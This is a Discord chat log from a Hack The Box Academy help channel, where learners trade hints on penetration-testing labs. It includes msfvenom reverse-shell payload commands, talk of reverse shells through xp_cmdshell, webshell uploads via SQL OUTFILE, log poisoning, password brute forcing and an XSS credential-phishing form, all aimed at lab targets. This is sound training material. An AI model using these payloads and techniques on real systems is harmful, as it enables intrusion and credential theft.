#modules
:D
Hello, can someone please help me with this module: Active Infrastructure Identification
I have not been able to understand how to do it!
Thats funny I couldnt get mssqlclient to work at all but sqsh. might be which box its running off of maybe reset the box
Not sure what you're asking for ? It's quite clear tbh
Target: 10.129.207.165
vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local
Is with this, how can I add the vhost to that ip?
When I enter /etc/ "hosts" does not exist.
what are you running that you dont have /etc/hosts??
┌─[htb-ac680638@htb-lzizkyuidx]─[/etc]
└──╼ $cd /etc/hosts
bash: cd: /etc/hosts: Not a directory
┌─[✗]─[htb-ac680638@htb-lzizkyuidx]─[/etc]
I'm pretty sure that yes, I'm doing something wrong, but I don't know what it is ..
What do you think this means?
/etc/hosts: Not a directory
The error very clearly tells you exactly what you're doing wrong
like no seriously what are you running where you dont have /etc/hosts
What I think is ok, yes, I'm not in the right directory, I should, but how do I do it, sorry for the question but I didn't quite understand what to do or how to enter the ip and add the vhosts.
I'm just starting in this...
If you're used to using a text editor, the HTB pwn box has an app called pluma you can use to edit files
or you can do it from cli, best to stick with what you know then learn the cool kid stuff later
try sudo vim /etc/hosts
What tamper-script do I use to get flag11 on SQLMap Essentials?
you might want to do the Intro to Infosec Fundamentals path instead
yes; but you're not gonna learn that here
Im searching through the dc
looking for info on how to take snapshots since the interface in the setting up module doesn't look familiar
not sure whether this is vmware pro??
to share screenshots/images you'll need to verify your hackthebox account in #bot-commands
ohkk
I use VMware workstation pro so I don't know about the player version but I'm pretty sure you can also take snapshot with it (not 100% sure)
according to the linked thread @vital adder it's not possible
Oh 🤣
Lol it's ok
Yea. You need vmware pro for snapshots
ic ty
You can take a "snapshot" in vmware player, just shut it down, and copy the directory where all the associated .vmx* files are to another location. Then if you ever want to restore, copy those over your current files.
It's not elegant, but it works.
Also guys sorry for not being active lately Offshore been really kicking me in my nut also right now I'm traveling (force by family)
hopefully I could go back to normal after the prolabs
Thank but my nut hurts
Haha, I know what you mean...
Whenever you think you are taking a step forward… 🥄
I always think of that movie of the Spoon Murderer. Again and again and again...
https://m.youtube.com/watch?v=9VDvgL58h_Y
YES
How's your nut I mean Offshore
I am currently taking a forced break. My laptop had to go to the repair centre
I was always nice with him, really! 🙈
I think the same thing happened to me halfway through the academy 🤣
Did you also destroy a laptop? Mine no longer wanted to work 🤣
He switched off and was dead
CPTS was probably too hard for him 🤣🤪
Nope my charger port just said I'm out one day and never come back for no reason 🤣
I think that was the last day or something
I don't know exactly what is broken. But probably also the port for the charging cable.
During the warranty period
if it's a Dell; generally you're gonna have decent luck getting it repaired under warranty even if it's on like the last day
Oh yeah I think my charging cable was rusted and to this day still no idea how tf that happened
you don't have to work with it outside in the rain 🤣
I think a little break is good for me.
Hey, can anyone remember which module went through setting up a cloud-based attack box, and more specifically, securing RDP with MFA etc.? For the life of me cannot find it.
Yep. My dad's laptop stopped charging one day and they sent a technician to fix the day after he called them
must have prosupport that nbd service comes in clutch
Yea
- depending on parts and labor availability
if you can't tell i've been shopping around
and looking at warranties
Haha
by far Dell has the best high-tier paid support
I have an MSI laptop that I got about 5 years ago. Never had any issues with it. Thing is an absolute beast
I only have the standard warranty package. That's why I had to send the laptop in.
ah standard warranty so that send in is gonna be a week iirc
Sounds about right
Yes, i think so
I received an email yesterday that the repair is finished and they are now testing the device. They will probably send it back today
As I said, such a break after an exam is absolutely okay
I think HTB is already planning the next certificate. All the new modules point to another certificate in the web area....
Means, again a lot of learning and then again an exam.
Yea. Seems like it
Anyone about that knows question 2 of Brute Forcing Cookies??? Im stuck at the moment with using CyberChef. I can get it to decode the first part of the cookie. The middle is missing.
It doesn't include monthly cubes but you'll earn a lot by just doing modules
You must first decode the cookie with || URL Decode ||
can anyone help me with how to download xfreerdp tool on my parrot OS?
I usually just utilize the vpn on my own Kali machine but the few times I have used HTB academy’s Parrot OS machine I thought I remember xfreerdp already being installed. Sorry if I am incorrect.
you are correct, the machines that are in the website do have xfreerdp, but the problem is the screen does not show me the task bar of the windows machine that I am trying to get a connection on (for example I can not access the search bar to access programs) that is why I am trying to download it to my vmware parrot OS but could not figure out how
Hi all, I could use a push/DM from someone regarding this module:
AD Enumeration & Attacks - Skills Assessment Part II question:
Present the contents of the flag.txt file on the administrator's desktop on the SQL01 host.
via xp_commandshell i opened a reverse shell in powershell and am "nt service\mssql$sqlexpress" now i would need a hint to do privesc and become admin
Oh my apologies. I just realized you stated “my parrot OS”. Umm..I’m not too sure about that. I attempted to ask open chat GPT but website seems to be down atm.
Have you checked privilege ?
yes bro i have a SeImpersonatePrivilege enable
ok work
typo
You need to be more specific. What module?
i use correct password but not login & redirect to login page
If this is not module related then I can't help you further
module ? model are up to date
Gathering from this context, it is nothing module related. Please use #1024429874246590575
okay thanks
careful with spoilers
ok i got it tks
hello i am looking for help for the module login brute forcing /login form attacks
Check out the "Privileged Access" -> "Choosing enable_xp_cmdshell" Section
Anyone working with the easy lab of attacking common services?!?
Hii
where you stuck?
I got the user but not the password... I`m going through rockyou wordlist but the time will end... I couldn't find the password in the list provided....
try it with medusa
Ok!
hydra will not find it, dont know why
medusa is running now!
Hey, could someone help me with Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used password lists from the resources and rockyou.
you prob need to use mut list you created before
The one with 94k passes? For remote attack? I don't think I'll make it in the 90 minutes for which the lab is assigned :/
Is it really the solution?
I dont know what are you talkin about my mut list is 2.5 mb and rockyou 136mb
try creating smaller mut list
dont add everything in it
I mean, I used the rule from resources
yeah but on which pass list
custom.rule on password.list
I dont know, pass not that hard it has one special character in the end thats all I can say
Thanks 🙂
Still running medusa... my machine is about to die hahaha
anyone finished the crackmapexec skill assessment that can help me with some hint?
Hi there, Could someone tell me whether wpscan can detect all the active plugins? Because I found some vulnerable plugins on the admin page but wpscan doesn't detect them.
hello guys i need help here please , i modified the db and changed the amount from 5 to 99999912 but nothing change in the game .. can someone tell me to do to debugging the amount in the game for the acc to modify the amount in the game ?
hi guys I'm doing the Attacking Common Services SMTP exercises. I get the username using the RCPT mode with the enum -M command, all good, but when i telnet in to try and re-create this to check my understanding I just get "503 must have sender first"
any ideas why the RCPT mode in the script works but manually checking doesnt?
haven't done that but it tells you why you got the 503, it's because you haven't specified the send to email ¯_(ツ)_/¯
The script probably does some simple name@domain thing
yeh, it must do a "MAIL FROM:test@test.com"
I just verified, that works
when you do RCPT TO:m....@inlanefreight.htb it comes back with 250 OK
if you put a wrong username it comes back "550 Unknown user"
interesting
thanks for your thoughts Marcie
Probably why rcpt takes a bit longer
yeh, I like to telnet into pop3/imap/smtp to take a look around before just firing up the scripts so i understand what is going on
now i need to brute force this dudes passwd
ok work bro
How did you find the hash of CT059, did you do a GetUserSPNs.py attack? It didn't find anything for me, I even looked with bloodhound
Hi - any nudges on brute forcing cookies question 2? I used the python script Decodify which gives me url -> base64 but this results in gibberish. Any help?
Solved it
"sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53" can someone explain what is the use of --source-port ?
Module Server Side Attacks, the Explanation for Apache Reverse Proxy & AJP installation does not work.
isn't it because the service you're trying to ping usually expects packets coming from a service running on this port and would block the ping otherwise?
It's not about what the service expects. It's about the firewall. For example, a firewall may block any traffic that originates from any non standard port. But if the machines behind the firewall need internet access, it would have to allow DNS which means if your packets originate from port 53 there's a good chance they will be allowed through
Thank you so much for sharing your knowledge
Remote/Reverse Port Forwarding with SSH
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
can someone check my payload.
Metasploit
[*] 127.0.0.1 - Command shell session 56 closed.
[*] 127.0.0.1 - Command shell session 57 closed.
[*] 127.0.0.1 - Command shell session 58 closed.
[*] 127.0.0.1 - Command shell session 59 closed.
[*] 127.0.0.1 - Command shell session 60 closed.
SSH-R
debug1: client_input_channel_open: ctype forwarded-tcpip rchan 2 win 2097152 max 32768
debug1: client_request_forwarded_tcpip: listen 172.16.5.19 port 8080, originator 172.16.5.19 port 56488
debug1: connect_next: start for host 0.0.0.0 ([0.0.0.0]:8000)
debug1: connect_next: connect host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
debug1: channel 1: free: 172.16.5.19, nchannels 2
debug1: channel 0: free: 172.16.5.19, nchannels 1
I did notice on the example it goes all the way to port 61356, am I supposed to just wait?
debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61356
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
Check out the LLMNR/NBT-NS Poisoning - from Windows section
@simple zephyr the problem is in payload option
Thank you!
Hi could someone help me? I am stuck in File Upload Attack Skills Assessment and I managed to know the name of the directory where the files are uploaded, but when I try to add the name of a file that I have uploaded it gives me 404 not found. I think I am in the correct path because I write the name of the folder and the date before the file. I tried with a normal jpeg but it doesn't show
DM
what option should I be using? this was the one from the module.
@simple zephyr U need to change the payload options to what u used when creating a payload
Hello! I'm working with the easy lab of attacking common services module! I got username and password but I can't find any way to upload a shell... could I use msfconsole... I'm trying some modules but no luck...
hello can you help me.
I am in the SESSION SECURITY - Skills Assessment module.
Anyone working with the attacking common services module?!
Hey guys! I am in need of some help with a certain exercise that I've been struggling with for the past hour. I'm currently in the 'Repeating Requests' section of the 'Using Web Proxies' module, and no matter what I try using BurpSuite, I just can't get a hold of the second flag. What I've constantly tried is repeating commands like 'ls, pwd, cat, etc...' on the directories that I have, but all to no avail. I'll keep grinding at it, but if someone could help, I would appreciate it 😉
guys tell me how i should start hacking and making codes
You'll have to jog my memory on that one. I found it fairly straight forward so I don't have good notes on it. Feel free to dm me
im a little confused by this module's question https://academy.hackthebox.com/module/33/section/194 it says to login as the user tom but.... log in where?
trying to connect to the target spawned through a browser or mysql doesn't seem to work
tried both with and without port specified
nevermind im dumb
i was typoing the ip
just sent ya a friend request
i am having trouble the final step in https://academy.hackthebox.com/module/31/section/599. i have a python program written to make an input which i believe changes the stack to return a "leavemsg" call to the middle of a noop field that falls into a reverse proxy but it does not work and i can not see what i missed or what i am doing wrong. i would appreciate some hints on how to figure out what i am doing wrong in gdb.
What's a man got to do to discover the FTP port for the Attacking FTP section in the Attacking Common Services module? having flags -p 1-65335, -p-, -T 4 or -T 5, aren't working in discovering the port
22, 53, 139, 445 are the only ones that keep showing up no matter what i try
have you tried resetting the target
Only about 13 times now
you are running nmap with sudo rights, correct?
that , i was not doing,
attempting with sudo
Fucking hell, it was the sudo lol. Thanks @autumn pilot
i requested help on the academy web site should i see something on the discord service from this request?
someone will reach out to you as soon as possible
ok thanks
is there some way to extend my instances alive time or will i need to recreate everything again?
90 minutes fixed, unless it is an exam
usually 90 minutes is more than enough to finish an exercise
You got it?!
Yep, when in doubt, SUDO everything is a lesson learned
Still had to reset the box 2 more times though lol
Yeaaahhh
Anyone working with the easy lab of attacking common services?!?!
some of the scripts/methods that nmap will use might require a sudo privilege to access certain ports/sockets and etc
I imagine the -T and -p flag might be one of those
working my way down towards that
raw sockets / raw packets
Let me know when you get there hahaha
I`ve been stuck for a while... hopefully this evening I will get some inspiration haaha
let's not dump everything, but rather try to explain it with your own words what you have tried
rather than pasting the commands and outputs
I am stuck on this
https://forum.hackthebox.com/t/web-request-get/271457
I can see a working command there
Is it the last one as some said do it without the -i flag but was still stuck
nope
Ok let me try with them and come back to you on this
Ok tried this one no luck - curl -H ‘Authorization: Basic YWRtaW46YWRtaW4=’ http:// 178.128.163.230:31903
Also cannot copy from my local machine and paste in the VM 😦
So annoying have to log into my evernote
make sure to use the proper quotes as some of them are formatted and shells are not fans of that
ok let me try some of them will go through them and post here my findings
Do you know how to enable copy and paste between the vm and my local machine as i can copy and paste from VM to my local machine but not the other way around 😦
So have tried this one
curl 'http:// 178.128.163.230:31903/search.php?search=le' -H 'Authorization: Basic YWRtaW46YWRtaW4=
Get this error back: curl: (3) URL using bad/illegal format or missing URL
Done i have used dictionary attack
look at your command
I tried this one curl 'http://admin:admin@178.128.163.230:31903/search.php?search=flag’
Comes back blank
have you asked yourself why it could come blank
Because i have not included the authentication parameter
do you need one?
Yes in the cheat sheet it said to include it
Don't forget to set the user credentials when you send the 'search' request
Cookies are not the only way of authenticating via curl
Thinking......🫤
Why does HTB not direct you to start or tell you to sign up for the academy? Just curious as I was struggling to start and a lot of people were asking the same question online
Other way to authenticate is through the URL vs using cURL
because they are different platforms
I see, that’s a bit confusing
So tried with admin admin no luck 😦
HTB (not academy) is the first one that was created
and it was meant for people to push themselves into learning things that they don't know
or partly know
So academy is the way to go if you want to learn gotcha
I dont know any of this. i am sys admin but out of work and this is my only hope now
I think the high level super separation HTB does is a bit of a mistake, but its too baked into all the systems to really do anything about it now.
I am doing academy
like its extremely weird that you have to have two separate accounts. From an end user perspective it doesnt make any sense.
Yeah that’s what threw me off was trying to sign into the academy with the regular HTB credentials
Realized I have to make a separate account
GOT IT curl -v http://178.128.163.230:31903/search.php?search=flag -u admin:admin
Silly me was putting the command in vs searching for the flag
thanks for your help
hey anyone who has done bloodhound module. anyone getting this error?
Not done that module but its a pretty classic error
your ingestor is from a too incompatible version of bloodhound
need to either update your Bloodhound or update your ingestor and run again
lol im using the ingested items given to me by the module. guess ill downgrade
or a converter even better
❤️ much love to you guys and the community for quick response
I know some people that run a docker container specifically for bloodhound to make sure everything is compatible and in sync
awesome ima try some options
havent used bloodhound in a while but I am about to take the OSEP exam so I need to get it set back up
this worked great

I would greatly appreciate some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack. Been stuck for a day.
I have found user and password and I know the ip for the MS01 box but have tried multiple ways in logging into it with found credentials.
try evil-winrm
I have tried that and just tried again. Get a WinRMAuthorizationError.
Would it be okay if I DM’d you to see if I got the correct IP, credentials?
sure
Man, I'm finding the Academy modules to be slow to respond
*edit: the machines within the Academy modules
I’m a noob with discord..when clicking on your username and clicking the message icon your user doesn’t come up. Also searched for your username and doesn’t come up. Lol
what is meant by 'config file' in this question "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?" in module https://academy.hackthebox.com/module/18/section/81 .. i have assumed *.conf i have a find command that gives back a single file with what i think are the stipulations but it is not accepted. ideas?
figured it out... it wanted just the file name not the entire location
Anyone know why zap browser doesn't load HUD?
Ad blocker probably
sometimes zap just doesnt work for me period. Not a fan. good to be aware that it exists though
hi.. doing some sql modules and can not connect to. have: error 2002 (HY000) cant connect to local MYSQL server through socket '/run/mysqld/mysqld.sock' and using correct command which is: mysql -u root +ip -P port -ppassword
and it takes time to connect.. hmm..
"The Live Engagement" (Shells & Payload)
I feel silly asking this, but for the life of me I cannot find a browser in the foothold machine we're given in order to browse the various target web servers. Am I meant to tunnel my traffic back to my actual machine (vs. the foothold VM)?
Any nudge on Command Injections/Skill assessment? I think I found the vulnerable part as it gives a "malicious request denied!" error. But that is the only thing I ve got. I couldnt find any working command. If I didnt miss something, I tried everything on the module. Nothing works
The only working command gave me the flag 
I don't have any ad blocker
im pretty sure there is a browser, but personally I just used a tunnel
I have tried to restart it several times but it didn't work
Attacking email services - I have found the creds, however I am struggling with logging in as I am unable to login to all three services. Any help?
DM me!
I think firefox & in terminal will work, but I found using a tunnel was easier
im having an issue with a basic one, and its bothering me
tier 1, starting point, machine 'Three' with the bowling pin icon
I dont understand what is wrong, seeing as even referring to the walkthrough results in the same issue
#starting-point you'll need to verify your htb account in #bot-commands
i see
Attacking SQL databases - I was able to login but only with mssqlclient.py, not sqsh. If anyone was successful in logging in via sqsh would yall mind dm'ing me I'd like to see how that method works. Cause currently I am unable to.
hi,
so I'm currently trying to solve the challenge for the phishing section of the XSS Module. I figured out a working XSS payload and created an url, which injects a malicious login form into the html code, as requested by the challenge. If I try that url myself it works perfectly fine and the credentials are being sent to the my webserver as intended. But if I send the url to the "victim" I just receive the error "Issue in sending URL!". Does anyone have a clue, what could be causing that?
I know it's probably hard to tell without seeing the actual payload, but as far as I know, I'm not allowed to post that here, right?
Hello guys, im doing the Firewall and IDS/IPS Evasion - Medium lab.
Im using this command: sudo nmap $IP -p53-sS -Pn -n --disable-arp-ping --packet-trace --source-port 53, so i can pass through the filtered 53 port, but instead of saying open, it still says filtered
how can i find a way to open the filtered port, so i can connect via ncat?
Good evening, Anyone working with the attacking common services easy Lab!!!
Does it take a while for the Nessus Skills Assessment to load?
Hello. I finally got my discord working. I am new to hacking and studying to become a Ptester. As well as python. I am stuck on a question on linux and was looking for someone to point me in the right direction
If you tell us which module, which section and which question you are in, we can help you for sure.
not at all. Red teamers dont use nessus. Pentesters sometimes use it but not red teamers
I haven't done that module but is there a domain associated with that account ie. WORKGROUP or DOMAIN.XYZ
if you can't find the account name on the box you're logged in to then you might be able to find it somewhere else.
blatant hint: ||check the domain controller.||
Hey everyone, I'm not looking for the answer to this problem but if anybody can point me in the right direction to find the answer would be greatly appreciated
Been stuck on this for a while
sounds like the format of your id_rsa key isnt valid
Fixed it
I copied and pasted it into note pad and then copy pasted it into CL and it worked
not sure what was wrong with it but that fixed it
Ok, so i have a question about log poisoning. Im on the skills assessment for file inclusion. Cant really say what my issue is without giving away half the skills assessment so if anyone who finished that module is around to help out id greatly appreciate it
the first thing to know about log poisoning is that if your payload fucks up that it gg no re, you gotta reset the box
yea i know. Can I dm you?
second thing is that you can access the error log after it messes up to get the php error output
if it makes you feel better I originally learned that lesson about 14ish years ago against a live target for a malaysian webstore.
Yea. Now that im thinking about it it makes sense. Again , i cant believe i didnt think of that
thanks for the nudge
the payload was also super finicky for me. I had to do it in burp
gotcha
I got it. And now i see why the payload didnt work lmao
thats so annoying
Mood
dnsenum sure is one of those hurry up and wait... a life time for the scan to complete
hey everyone, im stuck on the knowledge check in the getting started module. Got a shell and the user flag, but unsure how to escalate privileges. sudo -l shows: "User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php"
I remember this from a previous module but when I try to run the command as root it does nothing. no error, no output or anything.
Can anyone provide me with a little nudge in the right direction?
have a look at GTFOBins
I've been looking, maybe I dont have the syntax right?
"sudo -u root /usr/bin/php <command>"
You’re gonna love Password Attacks
||you don't need to specify -u root||
Hi!
you passed it? brute forcing the support.us account by grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$' > testlist.txt wordlist, but can't login too
Hmm that link just brings me to this channel, not a specific message, if that was your intention
it's linking to my spoilered message
Hii
might be a shell issue as well, i don't remember everything but i was trying to do linux privesc on a box using gtfobins and the commands just wouldn't work until i used a more stable shell
I was thinking that as well. When I run "sudo su /usr/bin/php" the output is just blank and I cant do anything
wait not that
did you try running the set of commands on gtfobins?
Set? I just see a list
there's a search bar on the site, try looking up php
Thanks! Maybe file upload? To get linenum.sh uploaded
iirc that should be on the box already
or do I not even need linenum.sh now.. Damnit I'm confused haha.
usually if sudo -l returns a command you can run as root you won't need an automated enumeration tool for privilege escalation paths
Right, okay, thats what I just now realized. Hmm..
So this is where the PHP commands from gtfobins would come in handy yes?
i would say they're worth a shot
jfc, thank you, i feel stupid now haha. all part of the process I suppose.
anyone around that has done the skills assessment for broken authentication?
just got it!
@glacial matrix I would hint at making sure you are using the restrictions for passwords in your grep
Hi, I'm trapped at "AD Enumeration & Attacks - Skills Assessment Part I" in question 4: "Submit the contents of the flag.txt file on the Administrator desktop on MS01 ". Any hints about how to get the IP address for MS01? I only need that hint
Conduct an Nmapscan would be helpful
i miss the ":" and
what should I do next?
?
Thank you! what should I do next? I logged into support.us, found cookies separated by ":" But I can't find the recipe
you asked how to figure out the IP-Adress of MS01
You only have a webshell. You cannot directly apply Nmap
Also, even If I Do, there might be multiple machines and I have to know which one of those is MS01
Have you done "Pivoting, Tunneling, and Port Forwarding" Module?
Yes, but it is a Active Directory Module related. So it is more directly related with Domains
look back at the Pivoting Module. Try to gain a reverse shell and use it as a proxychain
Hi all
in footprinting module... section ipmi. in last question we have to prove the password. which needs to be brute forced with hashcat. does hashcat take too much time to crack it. i use the command hashcat -m 7300 ipmi.txt -a 3.
Please let me know.
Thanks 👍
sure also you may want to remove spoiler
not more than 5-10 minutes
Try with rockyou also you can just copy the given hashcat command from the section
@autumn pilot @vital adder . i used the same commands which is given in the section but it already takes half an hour. i use rockyou list with john tool.
are you sure you are not using the rockyou archive rather than the txt file
Hello, hope everyone is good.
I need some help in a web challenge called weather app.
I've been working on it for several days now and I'm stumped.
Can someone dm me for some hints or just a nudge.
I can list a few things I already tried and didn't work.
Thanksss
@autumn pilot i am using rockyou.txt.....
anyone had issue when trying to RDP to the windows machine in shells & payloads module. whenever I use xfreerdp to connect to the machine, it disconnects after one minute saying there is an error. can someone help?
even after I try to connect again, it says failed to connect
I used gnome-boxes for this one!
thanks 👍 @autumn pilot @vital adder .... i cracked it.
Good morning, anyone who can provide some hints with the attacking common services easy lab! I'm halfway but currently running out of ideas...
use some of the commands from previous sections
I`m going through several in mysql but no luck...
i just finished the attacking common services hard lab and i need a strong drink and a shower from the sweat
you'll want to try some other word lists....
you'll also need to work out how to put up a webshell and where to drop it
the phpinfo page might be worth looking at 😉
I got credentials but can`t find how to locate the file where the php web page is located...
should I be able to log in through ftp?
check all your ftp ports, there is a mention of a https service also
the key question is how can you upload a bit of php to an area where you can get the server to execute it by browsing to that php page
there is apparently another way of doing it but thats how i did it
i think there is a text file lying around that host which can help answer the above 😉
you'll get there mate
you'll be pleased to know the "easy" lab is way harder than the medium lab
and the hard lab is hard lol
Hahahahahah
I understand what I need to do but I don`t see how... I upload through the mysql console I assume...
yeh you may want to investigate select into outfile............
thats enough help from me LOL
I read the "https://mariadb.com/kb/en/select-into-outfile/"
everytime I need to deal with SQL I`m screwed...
the command you need is in the module
you just need to work out what php you need and where to send it
I must change this command but I don`t know from where to start...
well firstly you're trying to send to a linux directory when you are on a windows box
secondly you are missing the first part of the SELECT ... INTO OUTFILE (i.e. select!)
but your general idea is right
Thanks!! I will keep trying...
good luck, im sure we'll talk again when you get to the hard lab....
Hi could you help me? Module 147 and section 1320 I am at "Credential Hunting in Linux" finally I was able to log in as Kira but i can't find anything after that. Cannot read shadow file.. where can I find Will password? somebody give me a hint what to do? Thanks
can someone help me out with Meterpreter Tunneling & Port Forwarding I have a few questions with the payload
p3tA00@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
are they meant not to provide you with a payload that works? I found one that does finally and I get my connection back using
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.10 -f elf -o backupjob3 LPORT=8
ignore the IP's i just copied from the module
Any one doing Dante-Pro labs? I am having my time with some machine. Just rooted NIX-01, 02. Any one up there?
I would prefer chisel. It is easier. I am doing Dante-Pro lab using Chisel.
I am going to DM you
Were you just using netcat to listen for it? The first one is a staged meterpreter payload, so you need to be using multi/handler.
no i was using meterpreter, but got this error
ubuntu@WEB01:~$ ./backupjob1
Segmentation fault (core dumped)
and i would get session closed on the meterpreter
Is the box x64?
Nevermind, both were x64 payloads.
I don't see any reason it shouldn't have worked, unless there was a problem in transfer.
#prolabs-dante you'll need to verify your htb account
Hi everyone. I just joined and am taking the p-test path, on the Linux mod I was wondering if there is a hacking game a noob like me can play on htb. Or do I need to learn a little more. My programme language is a python novice.
Has anyone figured out flag11 (case11) on SQLMap Essentials? I've tried the tamper=between and tamper-=space2comment, as well as quite a few others. I've also increased the level and risk. No luck. Any help would be much appreciated!
if you want some prior knowledge before trying the boxes on the main HTB platform, i suggest completing the "Cracking Into HTB" path on HTB Academy
Never mind. I was making a boneheaded error.
although Information Security Foundations is an essential path if you want a deep understanding
Attacking Common Services - Attacking SQL Databases: Man I am a bit stumped, tried using mssqlclient.py and it works, however it will eventually lag out. But after this I am stuck on figuring out how to traverse after logging in (hopefully there is a more stable way to log in). Anyone mind nudging me in the right direction?
I'm not sure it's an error, so I'll rather post it here. Course "HTTPS/TLS Attacks", section "Bleichenbacher & DROWN".
"Download the zip file from the question above. You were able to capture TLS traffic between a client and the target server that you want to decrypt. Execute a Bleichenbacher Attack to obtain the premaster secret. Enter the unpadded premaster secret. The attack may take up to 30 minutes. Note: The IP address in the pcap file is different so you cannot use the -pcap option. Look at the help of the tool and find a way to pass the encrypted premaster secret to execute the attack."
Actually, the -pcap option can be used. Just port forward 127.0.0.1:443 to the remote endpoint, e.g. socat TCP-LISTEN:443,fork TCP:138.68.177.6:32396
By the way, that same endpoint does not seem to be working.
EDIT: working now, after a restart.
can someone help me with that?
from which module/section is that
What tools do yall use to pass the hash?
this is javascript It's a code I found, I suspect it's trojan I need help
this is not the channel for that
where is it sir ?
if there is winrm you can just use evil winrm or if it is AD stuff you can use mimikatz or rubeus
maybe #general
this channel is only for discussion about sections or modules in academy
for the stable thing try with sqsh and also if you are still stuck in that section shoot me a dm
what do you want to do
if you need some more hacking knowledge give both of these video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4
Ima keep trying for a bit but you might expect a dm lol
Im working on Attacking Common Services - Attacking SQL databases: Captured the hash of the svc account and now trying to figure out how to pass it back to login with that service account to the mssql service.
have you tried to crack it?
pls give the module and section name not the number in the url also and your next step is to take over the ||will user|| and for that hint check that user home directory
Yea tried using hashcat tho I wasn't able to use the tool as it didn't like the hash
play around with it a bit and you will get it
this is not the place for that use ++verify at #bot-commands and ask that at #challenges
if hashcat doesn't work always try with john 🤣
hint try with ||different protocol||
Attacking Common Services - Attacking SQL Databases: IF anyone needs help or guidance please feel free to dm me in the future. As well as for other sections in the module. Finally got the flag and only thing left is the labs at the end of the section.
So under module "Getting Started" first optional exercise it wants us to grab the banner. I have no clue what I'm doing wrong when I try ( nc ipaddress port) with it stating "time out". Any assistance would be appreciated ! ( path pen tester / getting started / basic tools)
One sec
id input the screen shot but it wont let me
@proud moon Are you using the pwnbox? And what command are you running?
Hello
Whenever I try to setup a netcat listener it’s unsuccessful
I tried it on 2 boxes so far
@proud moon Look at the target number highlighted in green in the question section. What else besides an IP address is attached to it?
@shadow nest Can ya show what command ya running? typical netcat listener is nc -lvnp (desired port)
I tried the most simplest php shells
Yes I tried nc -lnvp 1234
I am following the walkthrough step by step
One box is the Log4J
@iron basin are you talking about the ":" after the target ip address?
Yes, remember sometimes services can run on other ports besides the default ones.
what in the world, I tried that before and it didnt work lol
but now it did, thank you and yes i remember haha
All good, it gets me every now and then ;D @proud moon
Anyone have some free time tonight to help me. I used my own kali vm and htb platform
Same issue
@shadow nest Yeah you using pwnbox or own vm
If ya want dm me so I can see your shell code and commands @shadow nest
Hiii
I would greatly appreciate some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack. Been stuck for a long time.
Have found admins hash with system level privileges on SQL01 box and have chisel/pivoting tool running on victims box and it running on ssh attacker machine but receiving a connection error message when trying to pass the hash utilizing proxychains and evil-winrm
@iron basin @autumn pilot I am using the open vpn connection
For both my vm and htb platform
Yes I will send it over @iron basin
My fault picking up the kids from school lol
@shadow nest Can ya try the pwnbox as I have found openvpn sometimes to be finicky
all good
I checked will directory its empty
Very annoying, anyone have connectivity issues with certain labs?
nope
3;
Seems to me all my boxes no matter the section of this module continue to disconnect or timeout after around 5mins.
vpn issue?
@high sentinel Using pwnbox
just try running ping box in the background and check the output when the issue occurs
if the ping works just fine the whole time, i'd say that's some application level issue then
I dont know its weird behavior. I just reset the target machine and pwnbox and the target is unreachable. Earlier it worked then now its half n half, with half the time working and when it does it cuts out eventually.
hmm
maybe try running wireshark in the background as well? I think pwnbox should have no issue with vpn connectivity as long as there are no issues with htb infrastructure but i personally don't use it so i'm not like 100 % sure. Why don't you use your own vm?
I do when Im home but away I use pwnbox. Also find a vm over the browser just really cool for some reason haha
Yeah, reset the machine, ran ping, worked up until the 82nd icmp_seq and then disconnected again. Maybe its a feature of the lab I am working on? The lab is Attacking Common Services - Easy
I don't think that's a feature
still need help?
Yeah
I was suggesting that cause I thought my brute forcing may've caused me to get disconnected but when i reset the boxes and target again and just ran ping still got disconnected.
~~ Who says you need PtH? Bloodhound reveals all ~~ nvm im dumb, was looking at the wrong notes
well, not attacking the box and still being disconnected sounds like it's not a feature
DM me, dont wanna spoil anything here
Ye... just went to another module to try out by chance if it would work and still getting the same thing. Ima hop off but later ill see if its still doing it and if so try to analyze whats going with wireshark like you said
hmm, if you can get the wireshark capture file out of the box, maybe just attach it to a support ticket? Possibly a video of "idle" vm could be also helpful. I'm not sure how exactly this works but as i've said earlier i think the pwnbox should have no trouble with connectivity to boxes
Will do, thanks for the help!
I'm not sure how the support stuff works though, i've never used it so don't be too eager about that
Hey, general question for the group: I've noticed that a lot of my meterpreter connections in the labs frequently timeout after not so much time passes. In practice, I know that there are a multitude of things that could contribute to this (such as AV, system instability, etc.). However, I figured the labs that were purpose-built for introducing folks to Metasploit wouldn't include this added instability.
I'm wondering if anyone else has encountered a similar issue and what they've done to try and generate more stable shells.
shells/sessions sometimes just die, that's how things work. from my experience there are usually multiple factors that affect it. I'd say it's mostly stable on htb with certain exceptions. Are you having trouble on some specific box/lab/..? Are your sessions terminating regularly? Is there some common time period of termination?
Yeah, my thoughts too. It's just the frequency that it's occurring that's making me think I need to optimize something.
This problem seems to be agnostic of the Module in HTB Academy, hence my rationale that I might be inadvertently failing to configure something appropriately. Timing is about 1min or so post-connection established.
hmm .. are other forms of shells working just fine?
Generally, yes (e.g. python, netcat, perl, etc.)
